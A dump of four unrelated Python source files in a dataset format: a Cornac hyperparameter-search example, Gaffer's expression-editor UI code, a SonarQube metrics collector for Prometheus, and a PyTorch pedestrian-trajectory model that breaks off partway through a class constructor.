py | 1a4bbfb63aa1fca746b0d0b0999c9c2a4e3e5d7a | # Copyright 2018 The Cornac Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Example for hyper-parameter searching with Matrix Factorization"""
import numpy as np
import cornac
from cornac.datasets import movielens
from cornac.eval_methods import RatioSplit
from cornac.hyperopt import Discrete, Continuous
from cornac.hyperopt import GridSearch, RandomSearch
# Load MovieLens 100K ratings
ml_100k = movielens.load_feedback(variant="100K")
# Define an evaluation method to split feedback into train, validation and test sets
ratio_split = RatioSplit(data=ml_100k, test_size=0.1, val_size=0.1, verbose=True)
# Instantiate MAE and RMSE for evaluation
mae = cornac.metrics.MAE()
rmse = cornac.metrics.RMSE()
# Define a base MF model with fixed hyper-parameters
mf = cornac.models.MF(max_iter=20, learning_rate=0.01, early_stop=True, verbose=True)
# Wrap MF model inside GridSearch along with the searching space
gs_mf = GridSearch(
model=mf,
space=[
Discrete("k", [10, 30, 50]),
Discrete("use_bias", [True, False]),
Discrete("lambda_reg", [1e-1, 1e-2, 1e-3, 1e-4]),
],
metric=rmse,
eval_method=ratio_split,
)
# Wrap MF model inside RandomSearch along with the searching space, try 30 times
rs_mf = RandomSearch(
model=mf,
space=[
Discrete("k", [10, 30, 50]),
Discrete("use_bias", [True, False]),
Continuous("lambda_reg", low=1e-4, high=1e-1),
],
metric=rmse,
eval_method=ratio_split,
n_trails=30,
)
# Put everything together into an experiment and run it
cornac.Experiment(
eval_method=ratio_split,
models=[gs_mf, rs_mf],
metrics=[mae, rmse],
user_based=False,
).run()
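# A possible follow-up, kept as comments because the attribute name below is an
# assumption about the cornac.hyperopt API rather than something used above:
# each search wrapper keeps the configuration it selected on the validation set,
# so it could be inspected roughly like this after the experiment finishes.
#
#   print("GridSearch best params:", gs_mf.best_params)
#   print("RandomSearch best params:", rs_mf.best_params)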
|
py | 1a4bc169fdcc1e0f36b2b97d5f9dcce02bbef824 | ##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import functools
import IECore
import Gaffer
import GafferUI
Gaffer.Metadata.registerNode(
Gaffer.Expression,
"description",
"""
Utility node for computing values via
scripted expressions.
""",
"layout:customWidget:Expression:widgetType", "GafferUI.ExpressionUI.ExpressionWidget",
plugs = {
# This plug is added by the expressionCompatibility.py
# config file to provide compatibility for loading old
# files, so we must hide it.
"engine" : (
"plugValueWidget:type", "",
"nodule:type", "",
),
# This plug is added by the expressionCompatibility.py
# config file to provide compatibility for loading old
# files, so we must hide it.
"expression" : (
"plugValueWidget:type", "",
"nodule:type", "",
),
"user" : (
"plugValueWidget:type", "",
),
}
)
# PlugValueWidget popup menu for creating expressions
##########################################################################
def __createExpression( plug, language ) :
node = plug.node()
parentNode = node.ancestor( Gaffer.Node )
with Gaffer.UndoScope( node.scriptNode() ) :
expressionNode = Gaffer.Expression()
parentNode.addChild( expressionNode )
expressionNode.setExpression(
Gaffer.Expression.defaultExpression( plug, language ),
language
)
__editExpression( plug )
def __editExpression( plug ) :
expressionNode = plug.getInput().node()
GafferUI.NodeEditor.acquire( expressionNode )
def __popupMenu( menuDefinition, plugValueWidget ) :
plug = plugValueWidget.getPlug()
if not isinstance( plug, Gaffer.ValuePlug ) :
return
node = plug.node()
if node is None or node.parent() is None :
return
input = plug.getInput()
if input is not None or not plugValueWidget._editable() or Gaffer.MetadataAlgo.readOnly( plug ) :
return
languages = [ l for l in Gaffer.Expression.languages() if Gaffer.Expression.defaultExpression( plug, l ) ]
if not languages :
return
menuDefinition.prepend( "/ExpressionDivider", { "divider" : True } )
for language in languages :
menuDefinition.prepend(
"/Create " + IECore.CamelCase.toSpaced( language ) + " Expression...",
{
"command" : functools.partial( __createExpression, plug, language )
}
)
__popupMenuConnection = GafferUI.PlugValueWidget.popupMenuSignal().connect( __popupMenu )
# ExpressionWidget
##########################################################################
class ExpressionWidget( GafferUI.Widget ) :
def __init__( self, node, **kw ) :
column = GafferUI.ListContainer( spacing = 4 )
GafferUI.Widget.__init__( self, column, **kw )
self.__node = node
with column :
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, spacing = 4 ) :
GafferUI.Label( "Language" )
self.__languageMenu = GafferUI.MenuButton( "", menu = GafferUI.Menu( Gaffer.WeakMethod( self.__languageMenuDefinition ) ) )
self.__languageMenu.setEnabled( not Gaffer.MetadataAlgo.readOnly( node ) )
self.__textWidget = GafferUI.MultiLineTextWidget( role = GafferUI.MultiLineTextWidget.Role.Code )
self.__textWidget.setEditable( not Gaffer.MetadataAlgo.readOnly( node ) )
self.__activatedConnection = self.__textWidget.activatedSignal().connect( Gaffer.WeakMethod( self.__activated ) )
self.__editingFinishedConnection = self.__textWidget.editingFinishedSignal().connect( Gaffer.WeakMethod( self.__editingFinished ) )
self.__dropTextConnection = self.__textWidget.dropTextSignal().connect( Gaffer.WeakMethod( self.__dropText ) )
self.__contextMenuConnection = self.__textWidget.contextMenuSignal().connect( Gaffer.WeakMethod( self.__expressionContextMenu ) )
self.__messageWidget = GafferUI.MessageWidget()
self.__expressionChangedConnection = self.__node.expressionChangedSignal().connect( Gaffer.WeakMethod( self.__expressionChanged ) )
self.__errorConnection = self.__node.errorSignal().connect( Gaffer.WeakMethod( self.__error ) )
self.__update()
def node( self ) :
return self.__node
def textWidget( self ) :
return self.__textWidget
__expressionContextMenuSignal = Gaffer.Signal2()
## This signal is emitted whenever a popup menu
# for an ExpressionWidget is about to be shown.
# This provides an opportunity to customise the
# menu from external code. The signature for
# slots is ( menuDefinition, widget ), and slots
# should just modify the menu definition in place.
@classmethod
def expressionContextMenuSignal( cls ) :
return cls.__expressionContextMenuSignal
def __expressionContextMenuDefinition( self ) :
menuDefinition = IECore.MenuDefinition()
bookmarks = Gaffer.MetadataAlgo.bookmarks( self.__node.parent() )
def __bookmarkMenu( bookmarks ) :
bookmarkMenuDefinition = IECore.MenuDefinition()
def __walk( graphComponent, result ) :
if (
isinstance( graphComponent, Gaffer.ValuePlug ) and
self.__node.identifier( graphComponent ) and
not graphComponent.relativeName( graphComponent.node() ).startswith( "__" )
) :
result.append( graphComponent )
for c in graphComponent.children( Gaffer.Plug ) :
__walk( c, result )
for bookmark in bookmarks :
compatiblePlugs = []
__walk( bookmark, compatiblePlugs )
if not compatiblePlugs :
continue
for plug in compatiblePlugs :
label = "/" + bookmark.getName()
if len( compatiblePlugs ) > 1 :
label += "/" + plug.relativeName( bookmark )
bookmarkMenuDefinition.append(
label,
{
"command" : functools.partial( self.__textWidget.insertText, self.__node.identifier( plug ) ),
"active" : self.__textWidget.getEditable() and not Gaffer.MetadataAlgo.readOnly( self.__node['__expression'] ),
}
)
return bookmarkMenuDefinition
menuDefinition.append( "/Insert Bookmark", { "subMenu" : functools.partial( __bookmarkMenu, bookmarks ) } )
self.expressionContextMenuSignal()( menuDefinition, self )
return menuDefinition
def __expressionContextMenu( self, *unused ) :
menuDefinition = self.__expressionContextMenuDefinition()
if not len( menuDefinition.items() ) :
return False
title = self.__node.relativeName( self.__node.scriptNode() )
title = ".".join( [ IECore.CamelCase.join( IECore.CamelCase.split( x ) ) for x in title.split( "." ) ] )
self.____expressionContextMenu = GafferUI.Menu( menuDefinition, title = title )
self.____expressionContextMenu.popup()
return True
def __update( self ) :
expression = self.__node.getExpression()
self.__textWidget.setText( expression[0] )
self.__languageMenu.setText( IECore.CamelCase.toSpaced( expression[1] ) )
self.__messageWidget.clear()
self.__messageWidget.setVisible( False )
def __languageMenuDefinition( self ) :
currentLanguage = self.__node.getExpression()[1]
result = IECore.MenuDefinition()
for language in self.__node.languages() :
result.append(
"/" + IECore.CamelCase.toSpaced( language ),
{
"command" : functools.partial( Gaffer.WeakMethod( self.__changeLanguage ), language = language ),
"checkBox" : language == currentLanguage,
}
)
return result
def __changeLanguage( self, unused, language ) :
## \todo Can we do better? Maybe start with the default expression
# for the current output plugs?
self.__node.setExpression( "", language )
def __setExpression( self ) :
language = self.__node.getExpression()[1]
with Gaffer.UndoScope( self.__node.scriptNode() ) :
try :
self.__node.setExpression( self.__textWidget.getText(), language )
self.__messageWidget.setVisible( False )
except Exception as e :
self.__messageWidget.clear()
self.__messageWidget.setVisible( True )
self.__messageWidget.messageHandler().handle(
IECore.Msg.Level.Error, "Parse error", str( e )
)
def __expressionChanged( self, node ) :
self.__update()
def __activated( self, widget ) :
self.__setExpression()
def __editingFinished( self, widget ) :
self.__setExpression()
def __dropText( self, widget, dragData ) :
if isinstance( dragData, IECore.StringVectorData ) :
return repr( list( dragData ) )
elif isinstance( dragData, Gaffer.Plug ) :
name = self.__node.identifier( dragData )
return name if name else None
elif isinstance( dragData, Gaffer.Set ) :
if len( dragData ) == 1 :
return self.__dropText( widget, dragData[0] )
else :
return None
return None
# An error in the expression could occur during a compute triggered by a repaint.
# ( For example, if a user uses an expression to drive Backdrop text )
# If we forced a repaint right away, this would be a recursive repaint which could cause
# a Qt crash, so we wait for idle.
@GafferUI.LazyMethod()
def __error( self, plug, source, error ) :
self.__messageWidget.setVisible( True )
self.__messageWidget.messageHandler().handle( IECore.Msg.Level.Error, "Execution error", error )
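# A minimal node-level sketch of what this UI drives (assumptions: it runs
# inside a Gaffer session with a ScriptNode bound to `script`, and the plug
# path inside the expression string is hypothetical):
#
#   script["expressionExample"] = Gaffer.Expression()
#   script["expressionExample"].setExpression(
#       'parent["SomeNode"]["somePlug"] = context.getFrame()',
#       "python"
#   )
#   # GafferUI.NodeEditor.acquire( script["expressionExample"] ) then opens the
#   # editor containing the ExpressionWidget defined above.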
|
py | 1a4bc2c8da014f78499795b5db1d39dddc33b939 | import requests
import logging
from .config import Config
from prometheus_client.core import Gauge
import base64
CONF = Config()
class SonarQubeClient:
def __init__(self, url, user_token, **kwargs):
if url.endswith("/"):
url = url[:-1]
self._url = url
self._user_token = user_token
self._basic_authen = base64.b64encode(("%s:" % self._user_token).encode("ascii")).decode("ascii")
self._authenticate_header = {"Authorization": "Basic %s" % self._basic_authen}
self._kwargs = kwargs
logging.debug("Initialized SonarQube: url: %s, userToken: ****, %s" % (self._url, self._kwargs))
def _request(self, endpoint):
res = requests.get("{}/{}".format(self._url, endpoint), headers=self._authenticate_header, **self._kwargs)
res.raise_for_status()
return res.json()
def get_projects(self, page_index=1, page_size=100):
return self._request(endpoint="api/components/search?qualifiers=TRK&p={}&ps={}".format(page_index, page_size))
def get_metrics(self):
return self._request(endpoint="api/metrics/search")
def get_measures(self, component_key, metric_key):
return self._request(endpoint="api/measures/component?component={}&metricKeys={}".format(component_key, metric_key))
class Metric:
def __init__(self):
self._key = None
self._values = []
self._description = None
self._domain = None
self._type = None
self._tranform = False
self._tranform_map = {}
@property
def key(self):
return self._key
@key.setter
def key(self, value):
self._key = value
@property
def values(self):
return self._values
@values.setter
def values(self, value):
self._values.extend(value)
@property
def description(self):
return self._description
@description.setter
def description(self, value):
self._description = value
@property
def domain(self):
return self._domain
@domain.setter
def domain(self, value):
self._domain = value
@property
def type(self):
return self._type
@type.setter
def type(self, value):
self._type = value
@property
def tranform(self):
return self._tranform
@tranform.setter
def tranform(self, value):
self._tranform = value
@property
def tranform_map(self):
return self._tranform_map
@tranform_map.setter
def tranform_map(self, value):
self._tranform_map = value
class SonarQubeCollector:
def __init__(self, sonar_client : SonarQubeClient):
self._sonar_client = sonar_client
self._cached_metrics = []
# initialize gauges
logging.info("Intitializing...")
self._metrics = {}
raw_metrics = self._sonar_client.get_metrics()["metrics"]
for raw_metric in raw_metrics:
metric = Metric()
for supported_m in CONF.supported_keys:
if "domain" in raw_metric and raw_metric["domain"] == supported_m["domain"] and raw_metric["key"] in supported_m["keys"]:
metric.domain = raw_metric["domain"]
metric.key = raw_metric["key"]
metric.type = raw_metric["type"]
if "description" in raw_metric:
metric.description = raw_metric["description"]
else:
metric.description = raw_metric["name"]
if "tranformKeys" in supported_m and raw_metric["key"] in supported_m["tranformKeys"].keys():
metric.tranform = True
metric.tranform_map = supported_m["tranformKeys"][raw_metric["key"]]
self._metrics[metric.key] = metric
self._queried_metrics = str()
self._gauges = {}
for _, m in self._metrics.items():
if m.tranform:
self._gauges[m.key] = Gauge (name="sonar_{}".format(m.key), documentation=m.description, labelnames=("key", "name", "domain", "type", "value"))
else:
self._gauges[m.key] = Gauge (name="sonar_{}".format(m.key), documentation=m.description, labelnames=("key", "name", "domain", "type"))
self._queried_metrics = "{},{}".format(m.key, self._queried_metrics)
logging.info("Initialized %s metrics." % len(self._metrics.keys()))
def collect(self):
return self._cached_metrics
def run(self):
logging.info("Collecting data from SonarQube...")
response = self._sonar_client.get_projects()
total_projects = int(response['paging']['total'])
logging.info("There are %s projects in SonarQube" % total_projects)
processed_projects = 0
page_index = 1
while processed_projects < total_projects:
projects = self._sonar_client.get_projects(page_index=page_index)["components"]
for p in projects:
measures = self._sonar_client.get_measures(component_key=p["key"], metric_key=self._queried_metrics)["component"]["measures"]
for measure in measures:
m = self._metrics[measure["metric"]]
value = measure["value"]
gauge = self._gauges[measure["metric"]]
if m.tranform:
value = m.tranform_map[measure["value"]]
gauge.labels(p["key"], p["name"], m.domain, m.type, measure["value"]).set(value)
else:
gauge.labels(p["key"], p["name"], m.domain, m.type).set(value)
processed_projects += 1
page_index += 1
logging.info("{} projects were processed, {} project remaining".format(processed_projects, (total_projects - processed_projects)))
data = []
for key, g in self._gauges.items():
data.extend(g.collect())
self._cached_metrics = data
logging.info("SonarQube's data collected")
|
py | 1a4bc33ac7343d5e0f210057abb1c6a8fba1d7ef | import torch
import torch.nn as nn
import math
from torch.autograd import Variable
def make_mlp(dim_list, activation='relu', batch_norm=True, dropout=0):
layers = []
# batch_norm=True
dropout=0.25
for dim_in, dim_out in zip(dim_list[:-1], dim_list[1:]):
layers.append(nn.Linear(dim_in, dim_out))
if batch_norm:
layers.append(nn.BatchNorm1d(dim_out))
if activation == 'relu':
layers.append(nn.ReLU())
elif activation == 'leakyrelu':
layers.append(nn.LeakyReLU())
if dropout > 0:
layers.append(nn.Dropout(p=dropout))
return nn.Sequential(*layers)
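# For example (a sketch), make_mlp([16, 64, 32]) builds:
#   Linear(16, 64) -> BatchNorm1d(64) -> ReLU -> Dropout(0.25) ->
#   Linear(64, 32) -> BatchNorm1d(32) -> ReLU -> Dropout(0.25)
# Note that the hard-coded dropout=0.25 above overrides the dropout argument.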
def get_noise(shape, noise_type):
if noise_type == 'gaussian':
return torch.randn(*shape).cuda()
elif noise_type == 'uniform':
return torch.rand(*shape).sub_(0.5).mul_(2.0).cuda()
raise ValueError('Unrecognized noise type "%s"' % noise_type)
class PositionalEncoding(nn.Module):
"Implement the PE function."
def __init__(self, embedding_dim, dropout=0, obs_len=8):
super(PositionalEncoding, self).__init__()
self.dropout = nn.Dropout(p=dropout)
# Compute the positional encodings once in log space.
pe = torch.zeros(obs_len, embedding_dim)
position = torch.arange(0, obs_len).unsqueeze(1)
div_term = torch.exp(torch.arange(0, embedding_dim, 2) *
-(math.log(100.0) / embedding_dim))
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
pe = pe.unsqueeze(0)
self.register_buffer('pe', pe)
def forward(self, x):
x = x + Variable(self.pe,
requires_grad=False)
return self.dropout(x)
class Encoder(nn.Module):
"""Encoder is part of both TrajectoryGenerator and
TrajectoryDiscriminator"""
def __init__(
self, embedding_dim=64, h_dim=64, mlp_dim=1024, num_layers=1, obs_len=8,
dropout=0.0, pos_embed_flag=True
):
super(Encoder, self).__init__()
self.pos_embed = PositionalEncoding(embedding_dim)
self.h_dim = h_dim
self.embedding_dim = embedding_dim
self.num_layers = num_layers
self.pos_embed_flag = pos_embed_flag
# self.encoder = nn.LSTM(
# embedding_dim, h_dim, num_layers, dropout=dropout
# )
##TO DO Encoder -- Feedforward
# self.encoder = nn.Sequential(nn.Linear(embedding_dim*obs_len, h_dim*8), nn.Dropout(p=0.25), nn.Linear(h_dim*8, h_dim))
self.encoder = nn.Sequential(nn.Linear(embedding_dim*obs_len, h_dim), nn.Dropout(p=0.0))
self.spatial_embedding = nn.Linear(2, embedding_dim)
# def init_hidden(self, batch):
# return (
# torch.zeros(self.num_layers, batch, self.h_dim).cuda(),
# torch.zeros(self.num_layers, batch, self.h_dim).cuda()
# )
def forward(self, obs_traj):
"""
Inputs:
- obs_traj: Tensor of shape (obs_len, batch, 2)
Output:
- final_h: Tensor of shape (self.num_layers, batch, self.h_dim)
"""
# Encode observed Trajectory
batch = obs_traj.size(1)
obs_len = obs_traj.size(0)
##obs_traj --> (obs_len, batch, 2)
obs_traj_embedding = self.spatial_embedding(obs_traj.contiguous().view(-1, 2))
##obs_traj_embedding --> (obs_len * batch, embedding)
obs_traj_embedding = obs_traj_embedding.view(-1, batch, self.embedding_dim)
##obs_traj_embedding --> (obs_len, batch, embedding)
obs_traj_embedding = obs_traj_embedding.permute(1, 0, 2)
##obs_traj_embedding --> (batch, obs_len, embedding)
if self.pos_embed_flag:
# print("Embedding")
obs_traj_embedding = self.pos_embed(obs_traj_embedding)
obs_coord_embedding = obs_traj_embedding.contiguous().view(batch, -1)
## CAN ADD POSITION EMBEDDING HERE
## TO DO
hidden = self.encoder(obs_coord_embedding)
# hidden = output.view(batch, obs_len, -1)
# state_tuple = self.init_hidden(batch)
# output, state = self.encoder(obs_traj_embedding, state_tuple)
# final_h = state[0]
return hidden
class Decoder(nn.Module):
"""Decoder is part of TrajectoryGenerator"""
def __init__(
self, seq_len, obs_len=8, embedding_dim=64, h_dim=128, mlp_dim=1024, num_layers=1,
pool_every_timestep=True, dropout=0.0, bottleneck_dim=1024,
activation='relu', batch_norm=True, pooling_type='pool_net',
neighborhood_size=2.0, grid_size=8
):
super(Decoder, self).__init__()
self.seq_len = seq_len
self.mlp_dim = mlp_dim
self.h_dim = h_dim
self.embedding_dim = embedding_dim
self.pool_every_timestep = pool_every_timestep
# self.decoder = nn.LSTM(
# embedding_dim, h_dim, num_layers, dropout=dropout
# )
self.decoder = nn.Sequential(nn.Linear(h_dim + embedding_dim, 8*embedding_dim))
if pool_every_timestep:
if pooling_type == 'pool_net':
self.pool_net = PoolHiddenNet(
embedding_dim=self.embedding_dim,
h_dim=self.h_dim,
mlp_dim=mlp_dim,
bottleneck_dim=bottleneck_dim,
activation=activation,
batch_norm=batch_norm,
dropout=dropout
)
elif pooling_type == 'spool':
self.pool_net = SocialPooling(
h_dim=self.h_dim,
activation=activation,
batch_norm=batch_norm,
dropout=dropout,
neighborhood_size=neighborhood_size,
grid_size=grid_size
)
mlp_dims = [h_dim + bottleneck_dim, mlp_dim, h_dim]
self.mlp = make_mlp(
mlp_dims,
activation=activation,
batch_norm=batch_norm,
dropout=dropout
)
self.spatial_embedding = nn.Linear(2, embedding_dim)
# self.hidden2pos = nn.Linear(h_dim, 2)
self.hidden2pos = nn.Linear(embedding_dim, 2)
def forward(self, last_pos, last_pos_rel, noise_output, seq_start_end):
"""
Inputs:
- last_pos: Tensor of shape (batch, 2)
- last_pos_rel: Tensor of shape (batch, 2)
        - noise_output: Tensor of shape (batch, decoder_h_dim), the noise-augmented context
- seq_start_end: A list of tuples which delimit sequences within batch
Output:
- pred_traj: tensor of shape (self.seq_len, batch, 2)
"""
pred_len = 8
batch = last_pos.size(0)
pred_traj_fake_rel = []
last_pos_embedding = self.spatial_embedding(last_pos_rel)
decoder_input = torch.cat((noise_output, last_pos_embedding), dim=1)
decoder_output = self.decoder(decoder_input)
decoder_output = decoder_output.contiguous().view(batch, pred_len, -1)
decoder_output = decoder_output.contiguous().view(batch*pred_len, -1)
pred_traj_fake_rel = self.hidden2pos(decoder_output)
pred_traj_fake_rel = pred_traj_fake_rel.contiguous().view(batch, pred_len, 2)
# decoder_input = decoder_input.view(1, batch, self.embedding_dim)
# for _ in range(self.seq_len):
# output, state_tuple = self.decoder(decoder_input, state_tuple)
# rel_pos = self.hidden2pos(output.view(-1, self.h_dim))
# curr_pos = rel_pos + last_pos
# if self.pool_every_timestep:
# decoder_h = state_tuple[0]
# pool_h = self.pool_net(decoder_h, seq_start_end, curr_pos)
# decoder_h = torch.cat(
# [decoder_h.view(-1, self.h_dim), pool_h], dim=1)
# decoder_h = self.mlp(decoder_h)
# decoder_h = torch.unsqueeze(decoder_h, 0)
# state_tuple = (decoder_h, state_tuple[1])
# embedding_input = rel_pos
# decoder_input = self.spatial_embedding(embedding_input)
# decoder_input = decoder_input.view(1, batch, self.embedding_dim)
# pred_traj_fake_rel.append(rel_pos.view(batch, -1))
# last_pos = curr_pos
# pred_traj_fake_rel = torch.stack(pred_traj_fake_rel, dim=0)
return pred_traj_fake_rel
class PoolHiddenNet(nn.Module):
"""Pooling module as proposed in our paper"""
def __init__(
self, embedding_dim=64, h_dim=64, mlp_dim=1024, bottleneck_dim=1024,
activation='relu', batch_norm=True, dropout=0.0
):
super(PoolHiddenNet, self).__init__()
self.mlp_dim = 1024
self.h_dim = h_dim
self.bottleneck_dim = bottleneck_dim
self.embedding_dim = embedding_dim
mlp_pre_dim = embedding_dim + h_dim
mlp_pre_pool_dims = [mlp_pre_dim, 512, bottleneck_dim]
self.spatial_embedding = nn.Linear(2, embedding_dim)
self.mlp_pre_pool = make_mlp(
mlp_pre_pool_dims,
activation=activation,
batch_norm=batch_norm,
dropout=dropout)
def repeat(self, tensor, num_reps):
"""
Inputs:
-tensor: 2D tensor of any shape
-num_reps: Number of times to repeat each row
        Outputs:
-repeat_tensor: Repeat each row such that: R1, R1, R2, R2
"""
col_len = tensor.size(1)
tensor = tensor.unsqueeze(dim=1).repeat(1, num_reps, 1)
tensor = tensor.view(-1, col_len)
return tensor
def forward(self, h_states, seq_start_end, end_pos):
"""
Inputs:
- h_states: Tensor of shape (num_layers, batch, h_dim)
- seq_start_end: A list of tuples which delimit sequences within batch
- end_pos: Tensor of shape (batch, 2)
Output:
- pool_h: Tensor of shape (batch, bottleneck_dim)
"""
pool_h = []
for _, (start, end) in enumerate(seq_start_end):
start = start.item()
end = end.item()
num_ped = end - start
curr_hidden = h_states.view(-1, self.h_dim)[start:end]
curr_end_pos = end_pos[start:end]
# Repeat -> H1, H2, H1, H2
curr_hidden_1 = curr_hidden.repeat(num_ped, 1)
# Repeat position -> P1, P2, P1, P2
curr_end_pos_1 = curr_end_pos.repeat(num_ped, 1)
# Repeat position -> P1, P1, P2, P2
curr_end_pos_2 = self.repeat(curr_end_pos, num_ped)
curr_rel_pos = curr_end_pos_1 - curr_end_pos_2
curr_rel_embedding = self.spatial_embedding(curr_rel_pos)
mlp_h_input = torch.cat([curr_rel_embedding, curr_hidden_1], dim=1)
curr_pool_h = self.mlp_pre_pool(mlp_h_input)
curr_pool_h = curr_pool_h.view(num_ped, num_ped, -1).max(1)[0]
pool_h.append(curr_pool_h)
pool_h = torch.cat(pool_h, dim=0)
return pool_h
class SocialPooling(nn.Module):
"""Current state of the art pooling mechanism:
http://cvgl.stanford.edu/papers/CVPR16_Social_LSTM.pdf"""
def __init__(
self, h_dim=64, activation='relu', batch_norm=True, dropout=0.0,
neighborhood_size=2.0, grid_size=8, pool_dim=None
):
super(SocialPooling, self).__init__()
self.h_dim = h_dim
self.grid_size = grid_size
self.neighborhood_size = neighborhood_size
if pool_dim:
mlp_pool_dims = [grid_size * grid_size * h_dim, pool_dim]
else:
mlp_pool_dims = [grid_size * grid_size * h_dim, h_dim]
self.mlp_pool = make_mlp(
mlp_pool_dims,
activation=activation,
batch_norm=batch_norm,
dropout=dropout
)
def get_bounds(self, ped_pos):
top_left_x = ped_pos[:, 0] - self.neighborhood_size / 2
top_left_y = ped_pos[:, 1] + self.neighborhood_size / 2
bottom_right_x = ped_pos[:, 0] + self.neighborhood_size / 2
bottom_right_y = ped_pos[:, 1] - self.neighborhood_size / 2
top_left = torch.stack([top_left_x, top_left_y], dim=1)
bottom_right = torch.stack([bottom_right_x, bottom_right_y], dim=1)
return top_left, bottom_right
def get_grid_locations(self, top_left, other_pos):
cell_x = torch.floor(
((other_pos[:, 0] - top_left[:, 0]) / self.neighborhood_size) *
self.grid_size)
cell_y = torch.floor(
((top_left[:, 1] - other_pos[:, 1]) / self.neighborhood_size) *
self.grid_size)
grid_pos = cell_x + cell_y * self.grid_size
return grid_pos
def repeat(self, tensor, num_reps):
"""
Inputs:
-tensor: 2D tensor of any shape
-num_reps: Number of times to repeat each row
        Outputs:
-repeat_tensor: Repeat each row such that: R1, R1, R2, R2
"""
col_len = tensor.size(1)
tensor = tensor.unsqueeze(dim=1).repeat(1, num_reps, 1)
tensor = tensor.view(-1, col_len)
return tensor
def forward(self, h_states, seq_start_end, end_pos):
"""
Inputs:
        - h_states: Tensor of shape (num_layers, batch, h_dim)
- seq_start_end: A list of tuples which delimit sequences within batch.
- end_pos: Absolute end position of obs_traj (batch, 2)
Output:
- pool_h: Tensor of shape (batch, h_dim)
"""
pool_h = []
for _, (start, end) in enumerate(seq_start_end):
start = start.item()
end = end.item()
num_ped = end - start
grid_size = self.grid_size * self.grid_size
curr_hidden = h_states.view(-1, self.h_dim)[start:end]
curr_hidden_repeat = curr_hidden.repeat(num_ped, 1)
curr_end_pos = end_pos[start:end]
curr_pool_h_size = (num_ped * grid_size) + 1
curr_pool_h = curr_hidden.new_zeros((curr_pool_h_size, self.h_dim))
# curr_end_pos = curr_end_pos.data
top_left, bottom_right = self.get_bounds(curr_end_pos)
# Repeat position -> P1, P2, P1, P2
curr_end_pos = curr_end_pos.repeat(num_ped, 1)
# Repeat bounds -> B1, B1, B2, B2
top_left = self.repeat(top_left, num_ped)
bottom_right = self.repeat(bottom_right, num_ped)
grid_pos = self.get_grid_locations(
top_left, curr_end_pos).type_as(seq_start_end)
# Make all positions to exclude as non-zero
# Find which peds to exclude
x_bound = ((curr_end_pos[:, 0] >= bottom_right[:, 0]) +
(curr_end_pos[:, 0] <= top_left[:, 0]))
y_bound = ((curr_end_pos[:, 1] >= top_left[:, 1]) +
(curr_end_pos[:, 1] <= bottom_right[:, 1]))
within_bound = x_bound + y_bound
within_bound[0::num_ped + 1] = 1 # Don't include the ped itself
within_bound = within_bound.view(-1)
# This is a tricky way to get scatter add to work. Helps me avoid a
# for loop. Offset everything by 1. Use the initial 0 position to
            # dump all unnecessary adds.
grid_pos += 1
total_grid_size = self.grid_size * self.grid_size
offset = torch.arange(
0, total_grid_size * num_ped, total_grid_size
).type_as(seq_start_end)
offset = self.repeat(offset.view(-1, 1), num_ped).view(-1)
grid_pos += offset
grid_pos[within_bound != 0] = 0
grid_pos = grid_pos.view(-1, 1).expand_as(curr_hidden_repeat)
curr_pool_h = curr_pool_h.scatter_add(0, grid_pos,
curr_hidden_repeat)
curr_pool_h = curr_pool_h[1:]
pool_h.append(curr_pool_h.view(num_ped, -1))
pool_h = torch.cat(pool_h, dim=0)
pool_h = self.mlp_pool(pool_h)
return pool_h
class TrajectoryGenerator(nn.Module):
def __init__(
self, obs_len, pred_len, embedding_dim=64, encoder_h_dim=64,
decoder_h_dim=128, mlp_dim=1024, num_layers=1, noise_dim=(0, ),
noise_type='gaussian', noise_mix_type='ped', pooling_type=None,
pool_every_timestep=True, dropout=0.0, bottleneck_dim=1024,
activation='relu', batch_norm=True, neighborhood_size=2.0, grid_size=8
):
super(TrajectoryGenerator, self).__init__()
if pooling_type and pooling_type.lower() == 'none':
pooling_type = None
self.obs_len = obs_len
self.pred_len = pred_len
self.mlp_dim = mlp_dim
self.encoder_h_dim = encoder_h_dim
self.decoder_h_dim = decoder_h_dim
self.embedding_dim = embedding_dim
self.noise_dim = noise_dim
self.num_layers = num_layers
self.noise_type = noise_type
self.noise_mix_type = noise_mix_type
self.pooling_type = pooling_type
self.noise_first_dim = 0
self.pool_every_timestep = pool_every_timestep
self.bottleneck_dim = 1024
self.encoder = Encoder(
embedding_dim=embedding_dim,
h_dim=encoder_h_dim,
mlp_dim=mlp_dim,
num_layers=num_layers,
dropout=dropout
)
